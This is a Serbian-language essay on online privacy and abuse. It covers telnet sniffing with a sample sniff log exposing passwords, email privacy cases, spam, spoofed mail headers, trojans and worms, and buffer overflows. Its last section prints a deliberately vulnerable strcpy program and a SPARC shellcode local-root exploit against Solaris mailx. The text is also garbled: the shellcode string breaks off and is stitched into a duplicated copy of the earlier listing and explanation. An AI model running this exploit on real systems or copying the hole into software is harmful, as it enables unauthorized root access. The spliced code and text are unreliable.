Privatnost je zasnovana na našoj sposobnosti da krijemo istinu.
Postoje dve vrste podataka koje zakon pokušava da zaštiti:
1. podaci koje smo nekome poverili, ili podaci koje je neko drugi prikupio o nama,
2. podaci o nama koje držite u tajnosti, koji su samo nama poznati.
Prva vrsta privatnosti koju bi zakon trebao da štiti – jeste privatnost informacija. Ako ste učinili javnom informaciju o vrednosti vaše kuće, stavljajući je pod hipoteku u sudu, ipak želite kontrolu nad dostupnošću tih podataka ostalima. Ili ako ste u apoteci kupili test za proveru trudnoće, i isti platili kreditnom karticom (time otkrivajući svoj identitet), i dalje ne želite da ta informacija bude dostupna svima u vašem gradu.
Druga vrsta privatnosti nam je poznatija: koliko novca imate u novčaniku, šta pišete u pismima svojoj dragoj(om), koje programe gledate na televiziji, šta mislite o javnim ličnostima, političarima...
To su sve informacije koje bi smo želeli da zadržimo samo za sebe.
Sama privatnost naši podataka može biti ugrožena i zloupotrebljena na više načina:
Ugrožavanje privatnosti prisluškivanjem gde je cilj sakupiti što više informacija o određenoj osobi
Ugrožavanje privatnosti e-mail poruka – (od strane poslodavca, kolega, trećih lica, državnih organa ...)
Ugrožavanje privatnosti davanjem sakupljenih informacija o nama trecim licima koja su za njih zainteresovana (internet oglašivačima, prodavcima određenih proizvoda i sl.)
3.2 Ugrožavanje privatnosti prisluškivanjem
Sam metod prisluškivanja (eng sniffing) zasniva se na osnovnim principima rada mreže gde paketi putuju od jednog do drugog računara pokušavajući da stignu do svoje krajnje odrednice – računara kome želimo da pristupimo.
U svakodnevnom radu i komunikaciji između dva računara najčešće korišćena komanda za prelaz sa jednog na drugi računrar putem mreže je komanda telnet, stim da se telnet ne uzima kao jedini vid pristupa ka nekom odredišnom računaru .
Način uspostavljanja veze između dva računara je sledeći (recimo da se nalazimo na računaru A, a B je računar na koju se "telnetujemo":
1. A -----SYN----> B
2. A <---SYN/ACK--- B
3. A ACK----> B
Najpre računrar A šalje zahtev za otvaranjem konekcije (SYN). Zatim računrar B odgovara sa tzv. SYN/ACK potvrdom da je zahtev za otvaranjem konekcije od strane klijenta A prihvaćen i u trecem koraku klijent uspostavlja vezu sa serverom B.
Recimo da klijent A ima IP adresu 66.66.66.66 a server B 66.66.66.99.
Konekcija koja se formira od mašina A ka mašini B putem koje se šalje sve što mi kucamo će imati oblik: 66.66.66.66.3456-66.66.66.99.23. Povratne informacije ka klijentu A se šalju putem: 66.66.66.99.23-66.66.66.66.3456. Pretpostavimo da se A i B nalaze na istoj mreži sa računarima C, D, E, F itd.
Tj. šematski:
A-------------------------------B
\ \ \ \
C D E F
Ukoliko neko znatiželjan ima fizički pristup nekom od računara C, D, E, F sve što treba da uradi je da pokrene neki eternet sniffer i svako slovo koje otkucamo će se pojaviti ili u sniff log fajlovima ili na ekranu u zavisnosti od same konfiguracije snifera. Tipičan sniff log izgleda ovako
................vt100..................neko.PaswOrd1.w. ps -u ivana...ls -ald /var/mail/vana....su.idiot96.clear. cd /var/mail.tail -f ivana...more ivana.cat .cd.w.ps -u ivana .finger ivana...cd /var/mail.cat ivana...id
Tačkicama su zamenjeni specijalni karakteri, kao npr ^M za return. Iz ovoga sniff loga moze se lako utvrditi da korisnik neko kao identifikaciju koristi password “PaswOrd1”. Dalje, može se utvrditi da je taj korisnik veoma zainteresovan za korisnicu “Ivana”. Takođe se može primetiti da taj korisnik zna root-ov password i da je putem komande su postao root ( pod pojmom root podrazumevamo fizički pristup hardveru na računaru na kojoj se kao operativni sistem koristi UNIX). Takođe se moze videti da je root-ov password u ovom slučaju “idiot96”, kao i da se korisnik “neko” intenzivno interesuje za sadržaj
mail–a korisnice sa usernamom “ivana”.
Gore navedeni primer je veoma poučan, jer pokazuje koliko je lako ugroziti nečiju sigurnost podataka i da je korišćenje telneta neopravdano i veoma opasno. Dovoljno je sačekati da korisnik pod imenom “neko” ne bude ulogovan na računrar jer bi bilo suludo biti ulogovan na kome su ovi podaci važeći i iskoristiti ih . Računar host neće znati na osnovu unetih podataka da li je to stvarno korisnik neko ili ne.
Ipak, nameće se pitanje: zašto bi nekoga uopšte zanimao naš username/password? Razlog je veoma jednostavan. Normalne instalacije UNIX-a su na žalost veoma loše napisane. Ponekada je dovoljno samo pribaviti username i password i dobiti root pristup na računaru.
Prisluškivanje (sniffovanje) je veoma popularna tehnika među hakerima, dokonim administratorima, kriminalcima, za sticanje potrebnih informacija. Sem toga računari komuniciraju putem kablova koji oko sebe stvaraju elektromagnetsko polje. Signale koji se šalju moguće je hardverski snimati i zatim kasnije analizirati.
Još lošija situacija je ako je neko root na računaru A sa kojeg se mi npr. telnetujemo, postoji mogućnost da nam jednostavno preuzme telnet sesiju, a isto to je moguće ako se neko nalazi na hostu C koji se nalazi između A i B (slika 1). Iz svega gore navedenog jasno je da je upotreba telneta ili ftp-a koji na mrežu šalju podatke u izvornom obliku neprihvatljiva.
Komandom traceroute uvek možemo utvrditi sve potencijalne lokacije na kojima možemo očekivati da neko snifuje.
Ako neko poznaje naš username i password, kada se jednom uloguje može da radi šta god poželi sa podacima na našem nalogu. Na svu sreću obični korisnici nemaju mogućnost da pristupaju hardveru, pa samim tim ni da mrežnu karticu prebace u tzv. promiscuous mod rada koji je potreban sniferu da bi preuzimao sve podatke sa lokalne mreze. Ali da sreća ne bude potpuna postoji puno korisnika koji to mogu i čine svakodnevno.
Danas se sve manje koristi telnet kao servis za daljinsko pristupanje zbog njegove nesigurnosti .Umesto njega danas se koristi SSH (secure shell) servis koji za razliku od telneta enkriptuje celokupan saobraćaj u komunikaciji između korisnika i servera.
Pored prisluškivanja telnet sesija moguće je prisluškivati i sve ostale TCP/IP sesije koje ne koriste metode kriptovanja. Samim tim znači da je jedan od servisa koji je i doprineo velikoj popularizaciji interneta, e-mail, takođe ugrožen.
Mesta gde se sve može neovlašteno pristupiti jednom e-mailu koji je poslat sa neke udaljene mreže se broje velikim ciframa.
O tome da li pojedinac lično smatra da mu je neophodna privatnost njegove elektronske pošte ili ne je njegovo pravo da odluči, ali novi predlog zakona to poistovećuje sa otvaranjem običnih pisama koji se smatra krivičnim delom.
O privatnosti elektronske pošte i samoj vrednosti pisama koja se razmenjuju između firmi, organizacija i institucija i diskusijama koje su o tome vođene u svetu podstiču sve firme koje obavljaju deo svoje komunikacije preko interneta da posvete ogroman deo novca i vremena u sisteme i metode zaštite privatnosti elektronske pošte. Čak je donet zakon o privatnosti elektronske pošte na radnom mestu kojim se jasno definiše da li i kad poslodavac ima pravo da kontroliše elektronsku poštu svojih zaposlenih.
Mislim da bi podizanje ovog pitanja u našoj sredini i na samim fakultetima bilo od velikog značaja za uvođenje normi ponašanja na internetu.
4. Preteče DDOS-a
4.1 Zloupotrebe elektronske pošte
Pod zloupotrebom elektronske pošte tokom godina su se izdvojili različiti pravci posmatranja.
•Sakupljanje ličnih informacija
•Zloupotreba podataka u komercijalne svrhe putem e-mail-a
•Lažno predstavljanje pute elektronske pošte (e-mail)
•Korišćenje e-maila kao načina distribucije virusa
Sakupljanje ličnih informacija (Personal data abuse) Kršenje privatnosti korisnika je kada se podaci o njima daju trećim licima bez njihovog odobrenja.
AOL je to učinio kada je dao podatke o mlađem podoficiru Timotiju Mek Veitu. Ti podaci su sadržali podatke o njegovom seksualnom opredeljenju (to da je on homoseksualac i da je posetio određene sadržaje na interenetu i da je bio u kontaktu sa određenim brojem homoseksualaca). Americka mornarica je tražila te podatke i iskoristila ih da bi ga otpustila. Mek Veit je podigao optužnicu protiv AOL-a zbog napada na privatnost, ali su oni nastavili da brane svoj postupak i svoje pravo da koriste podatke na način kako su im potrebni.*
Ono što je bito u svim ovim slučajevima da se svi ti podaci daju bez njihovog znanja i samim tim bez njihovog pristanka.Te podatke zatim dalje mogu da koriste i razne druge agencija,službe i slične organizacije. Čak je na pojedinim mestima omogućeno pojedincima da lako dođu do svih relevantnih podataka o drugom pojedincu.
Poseban problem kod e-mail poruke je u tome što u osnovi daje previše podataka o onome koji je šalje. Iz nje se može zaključiti odakle je poslata, iz koje zemlje, ko je pošiljalac, u koje vreme je poslata, preko kojih je sve servera prošla dok nije stigla do određene destinacije.
Teško je izbeći kriminal koji je vezan za elektronsku poštu, pošto je lako pratiti rad korisnika na sistemima sa PINE programom za pristup pošti, probijati kodiranu zaštitu moćnim i lako dostupnim softverom i ubacivati se u sisteme sa alatima koji su dostupni na internetu:
SpyNet (pages.prodigy.com/waite/waite1.htm#SpyLinks) ili Hacking Arcade (
[You must be registered and logged in to see this link.] Kodiranje je mogućnost, ali ako neko stvarno želi da čita vaše poruke moze veoma lako da ih dekodira sa odgovarajućim softverom.
Trenutno američko zakonodavstvo manje pažnje polaže na privatnost nego na praćenje toga šta ljudi pišu, kome i koliko često. To može da izgleda neophodno u nekim slučajevima, kao sto je slučaj Džejka Bejkera.
Džejk, student, je uhapšen zato što je poruka koju je poslao sadržala "komunikaciju na međudržavnom ili međunarodnom nivou koja sadrži pretnje, sa ciljem da se ponizi tuđa ličnost".
Očigledno imate pravo da šaljete takve poruke, ali uz rizik da budete nadgledani, ispitivani i javno poniženi. Nameće se pitanje: šta to prosečan korisnik elektronske pošte piše kada je potrebno da se to nadgleda od strane vlasti.
U 42 države SAD sudski ovlaštene institucije mogu legalno da čitaju tuđu postu (
[You must be registered and logged in to see this link.]U Vašingtonu je zakonom zabranjeno slanje anonimnih poruka iako je to veoma lako izvesti pa većina ljudi nije uhvaćena u tome. Pristup elektronskoj pošti je omogućen ogromnom broju ljudi, i treba ga koristiti sa oprezom.
4.2 Propaganda u komercijalne svrhe
AOL je podatke o korisnicima distribuirao i kompanijama. Podatke je prodavao marketinškim firmama putem mailing lista. Ovo nije kršenje zakona, iako su veoma specifične informacije prodate, zato što AOL tvrdi da korisnici mogu da povuku svoje ime sa liste u bilo koje vreme, samo ako to žele. Ali, ako neko ne zna da su njegovo ime i podaci prosleđeni marketinškim kompanijama, kako može da odluči da povuče svoje podatke.
Preko 70% kompanija daje lične podatke o svojim zaposlenima raznim kreditnim žirantima, 47% daje agencijama za izdavanje stanova i 19% raznim dobrotvornim organizacijama.
U zloupotrebu elektronske pošte spada i takozvano "spam"-ovanje. To predstavlja slanje velikog broja jedne poruke većem broju osoba od strane jednog pošiljaoca(najčešće su te poruke neka vrsta oglasa za proizvod ili uslugu koju pošiljalac želi da nam proda).
Problem SPAM-a spada u oblast Net-etike - kulture ponašanja i komunikacije na Internetu. Šta je dozvoljeno i u kojoj meri često se ne zna - baš kao i u realnom životu. Poruke koje svaki email korisnik svakodnevno prima mogu biti zaista iritirajuće, kako po svom sadržaju tako i samim znanjem da te poruke nismo tražili, te da nas neko koristi kako bi izvukao neku korist. Postojanje zakona je svakako jedan od načina zaštite korisnika i provajdera. Mnogi provajderi vode računa o pošti koju distribuiraju do krajnjih korisnika, ali ima i onih koji ostavljaju korisnicima da se sami izbore.
Specifičan način spam-ovanja je slanje puno e-mailova na određenog korisnika.
Na taj način se osim zatrpavanja "mete" beskorisnim porukama, zauzimaju resursi računara koji se koristi za slanje ili primanje tih poruka, pa moze doći i do blokiranja ili čak do oštećenja samog sistema.
Primer za to se video prilikom NATO bombardovanja Jugoslavije gde su određeni serveri koji su prikazivali web prezentacije o NATO-u bili onesposobljeni primanjem preko 20.000 email poruka svakog sata. U jednom trenutku sam server više nije imao mesta gde da primi tolike poruke i srušio se usled nedostatka mesta za snimanje privremenih podataka neophodnih za rad sistema.
Ovaj vid zloupotrebe je danas dostupan ne samo "velikim hakerima", već i običnim korisnicima Interneta. Danas 30% populacije na Internetu ima po neki program koji omogućava ovakvo bombardovanje nekoga gomilom poruka, jer se mogu naći na Internetu i veoma su jednostavni za upotrebu.
4.3 Lažno predstavljanje putem elektronske pošte
Postoji još jedan važan aspekt, a to je da elektronska pošta nije realna, već virtualna konverzacija, i kao takva može biti loše interpretirana i shvaćena na pogrešan nacin. To dolazi do posebnog izražaja ako se neovlašćeno koristi od treće strane.
Dodatni način zloupotrebe e-maila predstavlja slanje "fake-mail"-ova. U pitanju je slanje poruka tako da izgleda da ih je poslao neko drugi. Najčešće se jedino iz zaglavlja poruke može otkriti da poruku nije poslao onaj čije ime piše u poruci, tako da ako ne očekujete suprotno, možete da pomislite da je poruku poslao onaj u čije je ime poslata.
U te svrhe se može iskoristiti najobičniji mail program kao što su "Outlook Express", "Internet Mail", "Eudora", "Netscape Messager" ili je potrebno samo malo predznanja o radu samih mail servera i operativnog sistema linux.
Primer jedne poruke koja na prvi pogled izgleda normalno:
----------------------------------------------------------------------------------
From
[You must be registered and logged in to see this link.] Thu May 18 08:44:37 2000
Date: Thu, 18 May 2000 08:56:38 +0200
From:
[You must be registered and logged in to see this link.]Subject: Lazna poruka
Mala demonstracija kako se salju lazne poruka
----------------------------------------------------------------------------------
Ako bolje pogledamo u Zaglavlje te poruke shvatićemo da ona nikad i nije bila poslata sa euneta i da je lažna
----------------------------------------------------------------------------------Received: from amadeus.uni-bk.ac.yu (amadeus.uni-bk.ac.yu [194.247.207.33]
by amadeus.uni-bk.ac.yu (qmail invoked from network)withESMTP id IAA14979
for <
[You must be registered and logged in to see this link.]>; Thu, 18 May 2000 08:44:21 +
From:
[You must be registered and logged in to see this link.]Received: from localhost (localhost [127.0.0.1])
by amadeus.uni-bk.ac.yu (qmail invoked from network) with SMTP id IAA21723
for
[You must be registered and logged in to see this link.]; Thu, 18 May 2000 08:56:38 +02
Date: Thu, 18 May 2000 08:56:38 +0200
Message-Id: <
[You must be registered and logged in to see this link.] >
X-Authentication-Warning: amadeus.uni-bk.ac.yu: localhost [127.0.0.1]
Subject: Lazna poruka
Ključne stavke su
Received: from localhost (localhost [127.0.0.1])
by amadeus.uni-bk.ac.yu (qmail invoked from network) with SMTP id IAA21723
for
[You must be registered and logged in to see this link.]; Thu, 18 May 2000 08:56:38 +02
X-Authentication-Warning: amadeus.uni-bk.ac.yu: localhost [127.0.0.1]
Primer 1
U stavci Received vidi se da je mail stvarno poslat preko mail servera na amadeusu i to tako što je poslat mail sa njega samog(localhost). Kada se primi jedan ovakav mail potrebno ga je poslati nazad na abuse@imeprovidera_odakle_je_mail ili root@imeprovidera_odakle_je_mail sa konstatacijom da je mail lažan i da tražite od administratora sistema da reaguje na zloupotrebe mail servera.
4.4 Korišćenje e-maila kao oblik distribuiranog napada
Mail bombardovanje je veoma primitivna tehnika, pa se gotovo više i ne koristi. Skoro svi provajderi imaju zaštitu od mail bombi (server odmah zaustavi mailove ako primeti da dolaze iste poruke) a i krajnja zaštita je jednostavna - za manje od 5 minuta ćete ih obrisati, dok će zlonamerni korisnik potrošiti sate i sate da bi vam poslao par hiljada poruka.
Zbog toga se koristi nova tehnika, a to je slanje emaila koji može naneti (i obično donosii) veliku štetu. Radi se slanju trojanca ili virusa uz email u kojem se zlonamerni korisnik predstavlja kao veoma dobrotvorna osoba i neprimetno moli primaoca da startuje 'program' koji mu je poslao. Program je najčešće zaražen nekom vrstom virusa među koje najčešće spadaju
BackOrifice i NetBus, dva najpopularnija trojanca (analogija izvedena po tome što zlonamernom korisniku dozvoljava da se bez znanja vlasnika računara “useli” na zaraženi računar i time zlonamernom korisniku dozvoli nelegalan pristup računaru) koji kreiraju takozvani backdoor (eng. backdoor – zadnja vrata).
Pored trojanaca opasnost predstavljaju i virusi koji se šire putem emaila, tzv. crvi. Takvi virusi prate kome sve žrtva šalje pisma, i uz njihove emailove prikače i svoju kopiju, tako da primalac pisma dobije virus od svog prijatelja.
Zato je potrebno biti obazriv kada se prima mail poruka sa prikačenim programom. Posebno treba obratiti pažnju na dva nova tipa crva, a to su crvi iz porodice takozvanih 'VBA crva' čiji je predstavnik sada već čuveni crv 'I-LOVE'YOU' i crvi iz porodice 'ActiveX crva' koju predstavlja crv 'BubbleBoy'.
VBA crvi koriste posebnu tehniku kako bi zavarali potencijalnu žrtvu. Pored toga što crv nema ekstenziju EXE već VBA ili VBS (što znači da su pisani u Visual Basic Script formatu i da je za njihovo izvršavanje potreban IE), takvi crvi se obično distribuiraju sa extenzijom '.txt.vba', tako da potencijalna žrtva pomisli da se radi o običnom tekstu i startuju fajl. Pošto je zadnja ekstenzija '.vba', ne startuje se Notepad već IE koji izvrši program, tako da potencijalna žrtva postane prava žrtva.
Posle crva 'I-LOVE-YOU', koji se širi sa fajlom 'LOVE-LETTER-FOR-YOU.TXT.vbs', pojavilo se još nekoliko stotina prepravljenih verzija ovog crva, među kojima je i srpska verzija koja se zove 'Volim i ja Vas.txt.vbs'.
Specijalna vrsta zlonamernih email poruka su poruke koje koriste Java/ActiveX aplete da bi ubacili trojanca ili obrisali fajlove po disku. Aplet koji nosi takvo jedno pismo se izvrši čim ga korisnik otvori, tako da nije više ni potrebno da startujete prikačeni fajl - on se sam startuje!
Takav email može (bez startovanja pomoćnog EXE fajla) brisati fajlove, kopirati, i kreirati nove, prosto rečeno, aplet ima sve privilegije i može se 'ugnjezditi' u sistem, kako bi kasnije preduzeo neke nove akcije.
Takav jedan aplet nosi crv 'BubbleBoy' koji se kao i svi crvi širi putem emaila. Dovoljno samo da neoprezni korisnik otvori e-mail i postaće žrtva koja će svojom nepažnjom poslati kopiju crva na još nekoliko stotina emaila.
To je samo jedna mogućnost ovakvih mail poruka. Naime, taj aplet može startovati prikačeni fajl, koji će u ovom slučaju preuzeti punu kontrolu nad računarom primaoca i otvoriće zlonamernom korisniku 'zadnja vrata'.
4.5 Neovlašćeno ulaženje na računarski sistem
Neovlašćen pristup računarskom sistemu se najčešće svodi na korišćenje i zloupotrebu neke vrste sigurnosne rupe u samom sistemu.
Najčešće se to svodi na pravljenje i korišćenje exploita (programi pisani da iskoriste postojanje sigurnosne rupe u nekom sistemskom programu i dozvole onom ko je pokrenuo exploit da dobije neovlašćene privilegije na sistemu)
Najčešće korišćena metoda prilikom pravljenja exploita je klasičan buffer overflow.
Naime buffer overflow je prepunjavanje buffera i pisanje po prostoru po kom ne bi smelo da se piše u normalnim okolnostima. Ali šta se time dobija? Šta se može postići?
Evo i prostog programa koji u sebi sadrži klasičan buffer overflow:
<++> vuln.c
int main(int argc,char **argv){
char buf[256];
strcpy(buf,argv[1]);
printf("passed : %s\n",buf);
}
<--> vuln.c
Svaka funkcija koja se poziva mora da se vrati na mesto svog poziva.To se radi tako što se pri pozivu funkcije sa instrukcijom call na stacku sačuva EIP koji će se na kraju funkcije pokupiti i vratiti na mesto poziva.
Kako je main() funkcija i ona će biti pozvana (disass _start) i njen EIP će biti sačuvan negde na stacku. Na samom kraju funkcija nalazi se instrukcija ret koja će sačuvan EIP sa stack-a da pokupi i da se na taj način vrati odakle je pozvana. Međutim zbog specifičnosti samog rada sa memorijom i rada sa stackom (stack na i386 raste na dole) situacija u kojoj bi string bio veći od prostora koji smo mu dodelili definišući mu buffer (u ovom slučaju 256 byte) izazvao bi rušenje integriteta memorije jer bi preostali deo stringa (preko 256 byte) prepisao u memoriji i mesto gde je zapisan EIP ispuniti string karakterima i time izazvati pad programa kada na kraju funkcija pokrene ret da u EIP upiše string karaktere. Međutim, ako u EIP namerno upišemo adresu shell coda (tačnije prepuni buffer sa shell codom i čekamo da ga ret pokupi) i rezultat pada programa biće novi shell koji će se pokrenuti. Ako je program bio SUID (imao privilegije super korisnika (Super User ID)) dobićemo privilegije root-a na toj mašini i samim tim postati korisnik sa administratorskim privilegijama. Primer jednog klasičnog exploita koji se može koristiti na sistemima Sun Solaris kojim korisnik koji ga pokrene dobija efektivni root access.
id=6.#include <fcntl.h>
int main(int ac, char **av)
{
char shell[]=
"\x90\x10\x20\x06\x82\x10\x20\x88\x91\xd0\x20\x08" /* setegid(6) */
"\x90\x10\x20\x06\x82\x10\x20\x2e\x91\xd0\x20\x08" /* setgid(6) */
"\x90\x08\x3f\xff" /* and %g0,-1,%o0 */
"\x82\x10\x20\x17" /* mov 0x17,%g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"\x20\xbf\xff\xff" /* bn,a <shellcode-4> */
"\x20\xbf\xff\xff" /* bn,a <shellcode> */
"\x7f\xff\xff\xff" /* call <shellcode+4> */
"\x90\x03\xe0\x20" /* add %o7,32,%o0 */
"\x92\x02\x20\x10" /* add %o0,16,%o1 */
"\xc0\x22\x20\x08" /* st %g0,[%o0+8] */
"\xd0\x22\x2);
printf("passed : %s\n",buf);
}
<--> vuln.c
Svaka funkcija koja se poziva mora da se vrati na mesto svog poziva.To se radi tako što se pri pozivu funkcije sa instrukcijom call na stacku sačuva EIP koji će se na kraju funkcije pokupiti i vratiti na mesto poziva.
Kako je main() funkcija i ona će biti pozvana (disass _start) i njen EIP će biti sačuvan negde na stacku. Na samom kraju funkcija nalazi se instrukcija ret koja će sačuvan EIP sa stack-a da pokupi i da se na taj način vrati odakle je pozvana. Međutim zbog specifičnosti samog rada sa memorijom i rada sa stackom (stack na i386 raste na dole) situacija u kojoj bi string bio veći od prostora koji smo mu dodelili definišući mu buffer (u ovom slučaju 256 byte) izazvao bi rušenje integriteta memorije jer bi preostali deo stringa (preko 256 byte) prepisao u memoriji i mesto gde je zapisan EIP ispuniti string karakterima i time izazvati pad programa kada na kraju funkcija pokrene ret da u EIP upiše string karaktere. Međutim, ako u EIP namerno upišemo adresu shell coda (tačnije prepuni buffer sa shell codom i čekamo da ga ret pokupi) i rezultat pada programa biće novi shell koji će se pokrenuti. Ako je program bio SUID (imao privilegije super korisnika (Super User ID)) dobićemo privilegije root-a na toj mašini i samim tim postati korisnik sa administratorskim privilegijama. Primer jednog klasičnog exploita koji se može koristiti na sistemima Sun Solaris kojim korisnik koji ga pokrene dobija efektivni root access.
id=6.#include <fcntl.h>
int main(int ac, char **av)
{
char shell[]=
"\x90\x10\x20\x06\x82\x10\x20\x88\x91\xd0\x20\x08" /* setegid(6) */
"\x90\x10\x20\x06\x82\x10\x20\x2e\x91\xd0\x20\x08" /* setgid(6) */
"\x90\x08\x3f\xff" /* and %g0,-1,%o0 */
"\x82\x10\x20\x17" /* mov 0x17,%g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"\x20\xbf\xff\xff" /* bn,a <shellcode-4> */
"\x20\xbf\xff\xff" /* bn,a <shellcode> */
"\x7f\xff\xff\xff" /* call <shellcode+4> */
"\x90\x03\xe0\x20" /* add %o7,32,%o0 */
"\x92\x02\x20\x10" /* add %o0,16,%o1 */
"\xc0\x22\x20\x08" /* st %g0,[%o0+8] */
"\xd0\x22\x20\x10" /* st %o0,[%o0+16] */
"\xc0\x22\x20\x14" /* st %g0,[%o0+20] */
"\x82\x10\x20\x0b" /* mov 0xb,%g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"/bin/ksh";
u_long get_sp(void)
{ __asm__("mov %sp,%i0 \n"; }
unsigned long magic = get_sp() + 1444 ; /* default offset */
unsigned char buf[1220];
char *envi;
int cont;
envi = (char *)malloc(1000*sizeof(char));
for (cont=3;cont<990;cont=cont+4)
{ envi[cont]= 0xa6;envi[cont+1]=0x1c;envi[cont+2]=0xc0;envi[cont+3]=0x13; }
for (cont=803;cont<803+strlen(shell);++cont) envi[cont]=shell[cont-803];
memcpy(envi,"SO=",3);
envi[999]=0;
putenv(envi);
memset(buf,0x41,1220);
memcpy(buf+1120+24,&magic,4); /* fake %fp */
memcpy(buf+1120+28,&magic,4); /* fake %i7 */
buf[1220]=0;
execl("/usr/bin/mailx","mailx","-F",buf,NULL);
}
U skorašnje vreme postoji programski paket pod imenom “libsafe” (http://www.research.avayalabs.com/project/libsafe/) koji služi za zaštitu kritičnih elemenata stack-a za svaki program koji je startovan unutar operativnog sistema baziranih na UNIX platformama .”Libsafe” radi na principu terminacije, odnosno ukoliko dođe do prepisivanje stack-a “libsafe” automatski terminiše odnosno nasilno isključi taj program. Jedina mana paketa “Libsafe” jeste što je ograničen na UNIX platforme, što platforme tipa WINDOWS ostavlja u oskudici.
[You must be registered and logged in to see this image.]